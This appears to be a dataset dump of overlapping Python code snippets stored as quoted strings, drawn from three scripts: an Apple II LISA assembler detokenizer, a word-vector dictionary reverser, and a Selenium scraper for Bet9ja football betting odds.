"') and b < 127: s += chr(b) lastascii = True else: if",
"hex bytes 0xe4: '.hex', # one or more hex bytes 0xdf: '.asc', #",
"a line of length $d?) continue elif line[0] != len(line): if line[0] <",
"field when # inline comment follows s += chr(b & 0x7f) lastascii =",
"against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce:",
"'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely but not 100% sure about",
"0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2:",
"about these 0x86: 'bne', 0x87: 'beq', # directives prepended with '.' to distinguish",
"ASCII string, no terminator } def process(): lines = disk.split(chr(0x0d)) for line in",
"'%02x %02x' % (line[0], line[1]), line = line[2:] # rest must be ASCII:",
"if line[0] & 0x80: # opcode token and operand format byte if line[0]",
"print s if __name__ == '__main__': if len(sys.argv) != 2: print 'Usage\" python',",
"line[0] < len(line) and line[line[0]] == 0x20: # seems to happen with labels,",
"https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy',",
"if __name__ == '__main__': if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>'",
"''.join([ chr(b) for b in line[1:line[0]] ]) print s line = line[line[0]+1:] else:",
"see LICENSE file for licensing information # Partial detokenization of LISA assembler fragments",
"b in line[1:line[0]] ]) print s line = line[line[0]+1:] else: # skip, probably",
">= ord(' ') and b < 127: s += chr(b) lastascii = True",
"= line[1:] # lose length byte # opcode on line? if line[0] &",
"assembly instrs # names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw',",
"LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx',",
"line = line[1:] # lose length byte # opcode on line? if line[0]",
"s line = line[line[0]+1:] else: # skip, probably corrupted or not part #",
"format byte if line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x",
"two-part line s = ''.join([ chr(b) for b in line[1:line[0]] ]) print s",
"s = '' lastascii = True for b in line: if b >=",
"0xc0: 'adc', 0xc4: 'cmp', # very likely but not 100% sure about these",
"# ASCII string, no terminator } def process(): lines = disk.split(chr(0x0d)) for line",
"127: s += chr(b) lastascii = True else: if lastascii == True and",
"# high bit seems to flag the # end of operand field when",
"'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb') disk = bytearray(f.read()) f.close()",
"True else: if lastascii == True and b & 0x80: # high bit",
"0xe4: '.hex', # one or more hex bytes 0xdf: '.asc', # ASCII string,",
"len(line): if line[0] < len(line) and line[line[0]] == 0x20: # seems to happen",
"word 0xd8: '.adr', # 2-byte word #0xe4: '.db', # one or more hex",
"can you have a line of length $d?) continue elif line[0] != len(line):",
"if lastascii == True and b & 0x80: # high bit seems to",
"a binary file. import sys TOKENS = { # reversed by comparing assembly",
"else: print '%02x %02x' % (line[0], line[1]), line = line[2:] # rest must",
"lastascii = True for b in line: if b >= ord(' ') and",
"import sys TOKENS = { # reversed by comparing assembly fragments to Mystery",
"b & 0x80: # high bit seems to flag the # end of",
"line s = ''.join([ chr(b) for b in line[1:line[0]] ]) print s line",
"#0xd8: '.dw', # 2-byte word 0xd8: '.adr', # 2-byte word #0xe4: '.db', #",
"True for b in line: if b >= ord(' ') and b <",
"print '%02x %02x' % (line[0], line[1]), line = line[2:] # rest must be",
"assembly fragment print '[...]' continue line = line[1:] # lose length byte #",
"decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr', # 2-byte",
"+= chr(b) lastascii = True else: if lastascii == True and b &",
"+= chr(b & 0x7f) lastascii = True else: s += ' %02x '",
"prepended with '.' to distinguish from assembly instrs # names updated per LISA",
"found in a binary file. import sys TOKENS = { # reversed by",
"hex bytes 0xdf: '.asc', # ASCII string, no terminator } def process(): lines",
"detokenization of LISA assembler fragments found in a binary file. import sys TOKENS",
"reversed by comparing assembly fragments to Mystery House disasm # later verified against",
"100% sure about these 0x86: 'bne', 0x87: 'beq', # directives prepended with '.'",
"process(): lines = disk.split(chr(0x0d)) for line in lines: if len(line) == 0: #",
"line in lines: if len(line) == 0: # skip (XXX but can you",
"ASCII: operand, comment s = '' lastascii = True for b in line:",
"2-byte word 0xd8: '.adr', # 2-byte word #0xe4: '.db', # one or more",
"byte # opcode on line? if line[0] & 0x80: # opcode token and",
"' %02x ' % b lastascii = False print s if __name__ ==",
"len(line) == 0: # skip (XXX but can you have a line of",
"line: if b >= ord(' ') and b < 127: s += chr(b)",
"line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x %02x' % (line[0],",
"# later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp',",
"0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4:",
"inline comment follows s += chr(b & 0x7f) lastascii = True else: s",
"& 0x7f) lastascii = True else: s += ' %02x ' % b",
"fragment print '[...]' continue line = line[1:] # lose length byte # opcode",
"fragments to Mystery House disasm # later verified against LISA decoder at #",
"'.db', # one or more hex bytes 0xe4: '.hex', # one or more",
"string, no terminator } def process(): lines = disk.split(chr(0x0d)) for line in lines:",
"= False print s if __name__ == '__main__': if len(sys.argv) != 2: print",
"s += ' %02x ' % b lastascii = False print s if",
"print s line = line[line[0]+1:] else: # skip, probably corrupted or not part",
"'.hex', # one or more hex bytes 0xdf: '.asc', # ASCII string, no",
"of LISA assembler fragments found in a binary file. import sys TOKENS =",
"== 0x20: # seems to happen with labels, kind of # a two-part",
"labels, kind of # a two-part line s = ''.join([ chr(b) for b",
"== '__main__': if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f",
"# Partial detokenization of LISA assembler fragments found in a binary file. import",
"= True else: s += ' %02x ' % b lastascii = False",
"fragments found in a binary file. import sys TOKENS = { # reversed",
"of operand field when # inline comment follows s += chr(b & 0x7f)",
"'\\t' + TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]), line = line[2:]",
"House disasm # later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr',",
"' % b lastascii = False print s if __name__ == '__main__': if",
"= True else: if lastascii == True and b & 0x80: # high",
"'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk',",
"no terminator } def process(): lines = disk.split(chr(0x0d)) for line in lines: if",
"= disk.split(chr(0x0d)) for line in lines: if len(line) == 0: # skip (XXX",
"else: # skip, probably corrupted or not part # of assembly fragment print",
"+= ' %02x ' % b lastascii = False print s if __name__",
"< 3 # see LICENSE file for licensing information # Partial detokenization of",
"but can you have a line of length $d?) continue elif line[0] !=",
"True and b & 0x80: # high bit seems to flag the #",
"line[1]), line = line[2:] # rest must be ASCII: operand, comment s =",
"== 0: # skip (XXX but can you have a line of length",
"TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]), line",
"!= 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb') disk",
"0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely but not",
"line? if line[0] & 0x80: # opcode token and operand format byte if",
"'adc', 0xc4: 'cmp', # very likely but not 100% sure about these 0x86:",
"if line[0] < len(line) and line[line[0]] == 0x20: # seems to happen with",
"'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx',",
"in lines: if len(line) == 0: # skip (XXX but can you have",
"continue line = line[1:] # lose length byte # opcode on line? if",
"decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd:",
"length byte # opcode on line? if line[0] & 0x80: # opcode token",
"comment s = '' lastascii = True for b in line: if b",
"% b lastascii = False print s if __name__ == '__main__': if len(sys.argv)",
"binary file. import sys TOKENS = { # reversed by comparing assembly fragments",
"{ # reversed by comparing assembly fragments to Mystery House disasm # later",
"'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely but not 100%",
"kind of # a two-part line s = ''.join([ chr(b) for b in",
"chr(b) lastascii = True else: if lastascii == True and b & 0x80:",
"'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc',",
"more hex bytes 0xdf: '.asc', # ASCII string, no terminator } def process():",
"= ''.join([ chr(b) for b in line[1:line[0]] ]) print s line = line[line[0]+1:]",
"assembler fragments found in a binary file. import sys TOKENS = { #",
"len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb')",
"TOKENS = { # reversed by comparing assembly fragments to Mystery House disasm",
"in TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]),",
"sure about these 0x86: 'bne', 0x87: 'beq', # directives prepended with '.' to",
"rest must be ASCII: operand, comment s = '' lastascii = True for",
"$d?) continue elif line[0] != len(line): if line[0] < len(line) and line[line[0]] ==",
"to distinguish from assembly instrs # names updated per LISA decoder at #",
"with labels, kind of # a two-part line s = ''.join([ chr(b) for",
"or more hex bytes 0xdf: '.asc', # ASCII string, no terminator } def",
"follows s += chr(b & 0x7f) lastascii = True else: s += '",
"'.adr', # 2-byte word #0xe4: '.db', # one or more hex bytes 0xe4:",
"3 # see LICENSE file for licensing information # Partial detokenization of LISA",
"line[line[0]+1:] else: # skip, probably corrupted or not part # of assembly fragment",
"0x87: 'beq', # directives prepended with '.' to distinguish from assembly instrs #",
"have a line of length $d?) continue elif line[0] != len(line): if line[0]",
"of length $d?) continue elif line[0] != len(line): if line[0] < len(line) and",
"length $d?) continue elif line[0] != len(line): if line[0] < len(line) and line[line[0]]",
"with '.' to distinguish from assembly instrs # names updated per LISA decoder",
"seems to flag the # end of operand field when # inline comment",
"operand, comment s = '' lastascii = True for b in line: if",
"'[...]' continue line = line[1:] # lose length byte # opcode on line?",
"print '\\t' + TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]), line =",
"the # end of operand field when # inline comment follows s +=",
"line = line[line[0]+1:] else: # skip, probably corrupted or not part # of",
"from assembly instrs # names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8:",
"names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word",
"or more hex bytes 0xe4: '.hex', # one or more hex bytes 0xdf:"
] |
[
"to save the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args def main(args):",
"'-i', '--input-file', type=str, required=True, help=\"The file path to the word vector dictionary into",
"*.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file to save",
"as np import sys def parse_arguments(args_to_parse): description = \"Load a *.npy archive of",
") general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file to save the reversed",
"for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if __name__=='__main__': args = parse_arguments(sys.argv[1:]) main(args)",
"type=str, required=True, help=\"The target file to save the reversed dictionary\" ) args =",
"= np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec)",
"import numpy as np import sys def parse_arguments(args_to_parse): description = \"Load a *.npy",
"import argparse import numpy as np import sys def parse_arguments(args_to_parse): description = \"Load",
"vector dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target",
"reversed_wordvec = {str(v): k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if __name__=='__main__':",
"file to save the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args def",
"argparse import numpy as np import sys def parse_arguments(args_to_parse): description = \"Load a",
"to the word vector dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str,",
"wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v in wordvec.items()} np.save(args.output_file,",
"swap (reverse) the dictionary keys and values around\" parser = argparse.ArgumentParser(description=description) general =",
"dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file",
"main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v in wordvec.items()}",
"reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item()",
"= \"Load a *.npy archive of a dictionary and swap (reverse) the dictionary",
"dictionary \"\"\" import argparse import numpy as np import sys def parse_arguments(args_to_parse): description",
"options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path to the word vector",
"def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v in",
"help=\"The target file to save the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return",
"*.npy archive of a dictionary and swap (reverse) the dictionary keys and values",
"generating a reversed dictionary \"\"\" import argparse import numpy as np import sys",
"dictionary and swap (reverse) the dictionary keys and values around\" parser = argparse.ArgumentParser(description=description)",
"description = \"Load a *.npy archive of a dictionary and swap (reverse) the",
"dictionary keys and values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument(",
"and values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file',",
"around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True,",
"path to the word vector dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file',",
"def parse_arguments(args_to_parse): description = \"Load a *.npy archive of a dictionary and swap",
"format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file to save the",
"= {str(v): k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if __name__=='__main__': args",
"the word vector dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True,",
"a dictionary and swap (reverse) the dictionary keys and values around\" parser =",
"args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v",
"a *.npy archive of a dictionary and swap (reverse) the dictionary keys and",
"\"\"\" import argparse import numpy as np import sys def parse_arguments(args_to_parse): description =",
"return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for k,",
"parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The",
"'--output-file', type=str, required=True, help=\"The target file to save the reversed dictionary\" ) args",
"import sys def parse_arguments(args_to_parse): description = \"Load a *.npy archive of a dictionary",
"the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args def main(args): wordvec =",
"reversed dictionary \"\"\" import argparse import numpy as np import sys def parse_arguments(args_to_parse):",
"and swap (reverse) the dictionary keys and values around\" parser = argparse.ArgumentParser(description=description) general",
"parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k for",
"general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file to save the reversed dictionary\"",
"args = parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v):",
"the dictionary keys and values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options')",
"general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path to",
"{str(v): k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if __name__=='__main__': args =",
"sys def parse_arguments(args_to_parse): description = \"Load a *.npy archive of a dictionary and",
"= parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec = {str(v): k",
") args = parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec =",
"= parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path to the",
"of a dictionary and swap (reverse) the dictionary keys and values around\" parser",
"help=\"The file path to the word vector dictionary into *.npy format\" ) general.add_argument(",
"Script for generating a reversed dictionary \"\"\" import argparse import numpy as np",
"general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path to the word vector dictionary",
"argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path",
"word vector dictionary into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The",
"k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if __name__=='__main__': args = parse_arguments(sys.argv[1:])",
"parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file path to the word",
"values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str,",
"keys and values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i',",
"np import sys def parse_arguments(args_to_parse): description = \"Load a *.npy archive of a",
"numpy as np import sys def parse_arguments(args_to_parse): description = \"Load a *.npy archive",
"\"\"\" Script for generating a reversed dictionary \"\"\" import argparse import numpy as",
"type=str, required=True, help=\"The file path to the word vector dictionary into *.npy format\"",
"required=True, help=\"The target file to save the reversed dictionary\" ) args = parser.parse_args(args_to_parse)",
"archive of a dictionary and swap (reverse) the dictionary keys and values around\"",
"required=True, help=\"The file path to the word vector dictionary into *.npy format\" )",
"save the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args def main(args): wordvec",
"np.load(args.input_file).item() reversed_wordvec = {str(v): k for k, v in wordvec.items()} np.save(args.output_file, reversed_wordvec) if",
"into *.npy format\" ) general.add_argument( '-o', '--output-file', type=str, required=True, help=\"The target file to",
"\"Load a *.npy archive of a dictionary and swap (reverse) the dictionary keys",
"a reversed dictionary \"\"\" import argparse import numpy as np import sys def",
"(reverse) the dictionary keys and values around\" parser = argparse.ArgumentParser(description=description) general = parser.add_argument_group('General",
"target file to save the reversed dictionary\" ) args = parser.parse_args(args_to_parse) return args",
"parse_arguments(args_to_parse): description = \"Load a *.npy archive of a dictionary and swap (reverse)",
"file path to the word vector dictionary into *.npy format\" ) general.add_argument( '-o',",
"dictionary\" ) args = parser.parse_args(args_to_parse) return args def main(args): wordvec = np.load(args.input_file).item() reversed_wordvec",
"'-o', '--output-file', type=str, required=True, help=\"The target file to save the reversed dictionary\" )",
"= argparse.ArgumentParser(description=description) general = parser.add_argument_group('General options') general.add_argument( '-i', '--input-file', type=str, required=True, help=\"The file",
"'--input-file', type=str, required=True, help=\"The file path to the word vector dictionary into *.npy",
"for generating a reversed dictionary \"\"\" import argparse import numpy as np import"
] |
[] |
[
"============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu():",
"outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix",
"'GG/NG': index = i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME,",
"elem: # Compile info_1 = {} info_2 = {} home_team = each.find( 'div',",
"Chance and Single Chance def DS_chance(): # Odds s_odds = [] d_odds =",
"each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X']",
"60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc",
"Wait 5 seconds time.sleep(5) # Index of target index = -1 # Get",
"or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else:",
"for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v",
"= ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # =============================================================================================================",
"data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/'",
"Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target index = -1",
"EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup",
"Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja +",
"+ away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG']",
"for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break",
"from bs4 import BeautifulSoup import time import json import re from pathlib import",
"Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\")",
"'').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/'",
"info['match'] = home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home']",
"# Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the page",
"BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja =",
"e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4)",
"Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the page height =",
"# Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\")",
"= e info_1['match'] = home_team + ' vs ' + away_team info_2['match'] =",
"> .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\",",
"with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() # getMenu() # getLinks_Bet9ja()",
"'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): #",
"bs4 import BeautifulSoup import time import json import re from pathlib import Path",
"Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID,",
"import time import json import re from pathlib import Path # Browser Configurations",
"info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or",
"bet9ja + 'competition/soccer/' # link Object links = {} # fetch menu with",
"# ====================================================================================== # DNB def DNB(): # Odds odds = [] # fetch",
"# Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile,",
"home_team + ' vs ' + away_team info_2['match'] = home_team + ' vs",
"vs ' + away_team info_2['match'] = home_team + ' vs ' + away_team",
"outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance():",
"Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5)",
"0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass",
"as json_file: global data data = json.load(json_file) for e in data: # Initiate",
"data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item')))",
"a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v =",
"= BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td',",
"= e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile,",
"info_2['category'] = e info_1['match'] = home_team + ' vs ' + away_team info_2['match']",
"' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li',",
"e = [] for t in d: f = {} f['title'] = t['title']",
"info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or",
"open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for e in data:",
"selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By",
"document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5",
"home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e",
"Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME,",
"open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): #",
"re from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions()",
"'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script(",
"Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = []",
"global data data = json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e])",
"= each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away']",
"link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file:",
"Chance def DS_chance(): # Odds s_odds = [] d_odds = [] # fetch",
"+ w # Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt',",
"soup.select('.sports-table > .table-f') for each in elem: # Compile info_1 = {} info_2",
".accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\",",
"HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for",
"int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # #",
"for t in d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]',",
"links def getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/' # link",
"Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/' #",
"# Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data =",
"for each in elem: # Compile info = {} home_team = each.find( 'div',",
"len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index =",
"int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait",
"'/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] #",
"time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in",
"= id # fetch Submenu and Menu link for each in data: l",
"By from bs4 import BeautifulSoup import time import json import re from pathlib",
"= each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with",
"'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as",
"> -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page",
"0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass",
"pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG",
"<gh_stars>0 # Dependencies # ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains",
"# Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu",
"Odds s_odds = [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r')",
"with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG():",
"GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) #",
"each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 #",
"# Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() #",
